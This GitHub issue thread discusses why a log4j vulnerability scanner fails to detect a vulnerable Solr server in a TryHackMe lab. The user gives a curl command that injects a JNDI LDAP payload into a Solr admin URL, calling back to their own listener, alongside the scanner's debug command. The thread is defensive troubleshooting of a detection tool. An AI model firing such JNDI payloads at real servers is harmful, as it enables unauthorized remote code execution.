Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

No callback from vulnerable Solar log4j #129

Open
dutz1e opened this issue Dec 21, 2021 · 11 comments
Open

No callback from vulnerable Solar log4j #129

dutz1e opened this issue Dec 21, 2021 · 11 comments

Comments

@dutz1e
Copy link

dutz1e commented Dec 21, 2021

Hi,

As we talked earlier the scanner somehow does not seem to detect the vulnerable log4j Solar server in the Try Hack Me room Solar.
I ran the scan from my Kali box with the --debug option while having a netcat session from the Solar server to the ldap callback server.
image

log4jScanner-10_10_54_155__32-2021-12-21_171608.log

@GelosSnake
Copy link
Collaborator

What is the nature of the vulnerable server? Can you describe exactly how the vulnerability can be exploited in the hackme version? Please add more details so we can properly look into it and see if its in the scope of the scanner.

@xFreed0m
Copy link
Contributor

Also, are you sure you can get a callback from the server and there isn't any FW in the way?
Also, is it running on a vulnerable web server in the ports scanned by the tool?

@dutz1e
Copy link
Author

dutz1e commented Dec 22, 2021

@GelosSnake The PoC is by making a curl request with a JNDI payload to a netcat listerner. You can validate it in detail by checking Task 4 - Proof of Concept in the room which is publicly available.

@dutz1e
Copy link
Author

dutz1e commented Dec 22, 2021

@xFreed0m No firewall in use. I can run a netcat session with response from the vulnerable system (vagrant@solar) to the LDAP server on port 5555 at my kali box (eth0 - 192.168.1.12 / tun0 10.14.9.194)

@xFreed0m
Copy link
Contributor

Can you share log\screenshot of the curl command you used and the command used with the tool so we could compare?

@dutz1e
Copy link
Author

dutz1e commented Dec 22, 2021

Sure,

curl 'http://10.10.13.179:8983/solr/admin/cores?foo=$\{jndi:ldap://10.14.9.194:9999\}'

image
image
image

command to generate debug was ./log4jScanner-v0.3.1 scan --cidr 10.10.54.155/32 --ports=8983 --timeout=60 --debug

@xFreed0m
Copy link
Contributor

I believe there is a different in results because the payload in curl is in the URL and in the tool it's currently in the useragent and a http header.
@guybarnhartmagen , i'm mistaken?

@guybarnhartmagen
Copy link
Contributor

we also send in the URL

@guybarnhartmagen
Copy link
Contributor

can you clarify what are the IP addresses involved?
Kali box, running the tool: 10.14.9.194
Solar server (possibly vulnerable): 10.10.13.179
192.168.1.12
10.10.103.12

i am trying to understand the screenshots you shared

@dutz1e
Copy link
Author

dutz1e commented Dec 28, 2021 via email

@guybarnhartmagen
Copy link
Contributor

hmm - this might be a networking issue. the VPN connection should be solid - but it might not be. in which case, we would not see the callback connection.

my only suggestions is to try and recreate this issue with a local vulnerable VM, or you can use the docker file in our repo to spin a vulnerable app yourself

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

4 participants